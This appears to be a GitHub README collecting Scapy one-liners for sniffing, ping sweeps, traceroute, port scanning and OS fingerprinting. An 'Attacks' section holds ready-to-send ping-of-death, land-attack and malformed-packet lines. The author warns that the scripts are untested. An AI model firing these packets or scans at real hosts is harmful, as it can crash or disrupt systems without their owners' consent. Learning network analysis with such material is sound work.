Uberscapy
Scapy docs, examples, scripts and other stuff
Install / Use
/learn @0x90/UberscapyREADME
uberscapy
Scapy docs, examples, scripts and other stuff
WARNiNG: NOT ALL SCRIPTS ARE TESTED! CHECK BEFORE RUNNING!
Contents
docs - diffrent scapy docs examples - examples for official Scapy usage and more
Tutorial
Official Scapy usage tutorial is located here
Simple examples
Sniff
Sniffing on eth0:
sniff(iface="eth0", prn=lambda x: x.summary())
sniff(iface="eth0", prn=lambda x: x.show())
Formated sniff output
pkts = sniff(prn=lambda x:x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))
Identify ports
a=sniff(filter="tcp and ( port 25 or port 110 )", \
prn=lambda x: x.sprintf("%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport% %2s,TCP.flags% : %TCP.payload%"))
Ping
TCP ping:
srloop(IP(dst="www.google.com/30")/TCP())
TCP ping:
ans,unans = sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") )
ans.summary( lambda(s,r) : r.sprintf("%IP.src% conteasta") )
UDP ping
ans,unans = sr( IP(dst="192.168.1.1-10")/UDP(dport=0) )
ans.summary( lambda(s,r) : r.sprintf("%IP.src% contesta en udp") )
ARP ping manual:
ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2)
ans.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%") )
ARP ping built in:
arping("192.168.1.1")
Traceroute:
traceroute(["www.google.com","www.ust.cl","www.terra.cl","www.microsoft.com"],maxttl=20)
result, unans=_
result.show()
# save output
result.graph(type="ps", target="|lp")
result.graph(target="> grafico.svg")
Advaced traceroute + DNS
ans,unans = sr(IP(dst="terra.cl",ttl=(1,10))/TCP(dport=53,flags="S"))
ans.summary( lambda(s,r) : r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}"))
Dump traceroute output:
res,unans = traceroute(["www.ust.cl","www.santotomas.cl"],dport=[80,443],maxttl=20,retry=-2)
res.graph(type="ps", target="|lp")
res.graph(target="> grafico.svg")
Port scanner:
res,unans = sr( IP(dst="target")/TCP(flags="S", dport=(1,1024)) )
res.nsummary( lfilter=lambda (s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) )
OS fingerprint:
ans,unans = srloop(IP(dst="192.168.1.1")/TCP(dport=80,flags="S"))
Attacks
Malformed packets:
send(IP(dst="192.168.1.1", ihl=2, version=3)/ICMP())
Ping of death:
send( fragment(IP(dst="192.168.1.1")/ICMP()/("X"*60000)) )
Land attack (windows):
send(IP(src=target,dst=target)/TCP(sport=135,dport=135))
DHCP discovery:
conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[("message-type","discover"),"end"])
ans, unans = srp(dhcp_discover, multi=True)
ans.display()
Links
http://stackoverflow.com/questions/10818661/scapy-retrieving-rssi-from-wifi-packets
http://hackoftheday.securitytube.net/2013/04/wi-fi-ssid-sniffer-in-12-lines-of.html
http://hackoftheday.securitytube.net/2013/03/wi-fi-sniffer-in-10-lines-of-python.html
http://scholarworks.sjsu.edu/cgi/viewcontent.cgi?article=1191&context=etd_projects
http://pen-testing.sans.org/blog/2011/10/13/special-request-wireless-client-sniffing-with-scapy
http://raidersec.blogspot.com/2013/01/wireless-deauth-attack-using-aireplay.html
http://www.secdev.org/projects/scapy/portability.html
Related Skills
node-connect
340.5kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
84.2kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
340.5kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
commit-push-pr
84.2kCommit, push, and open a PR
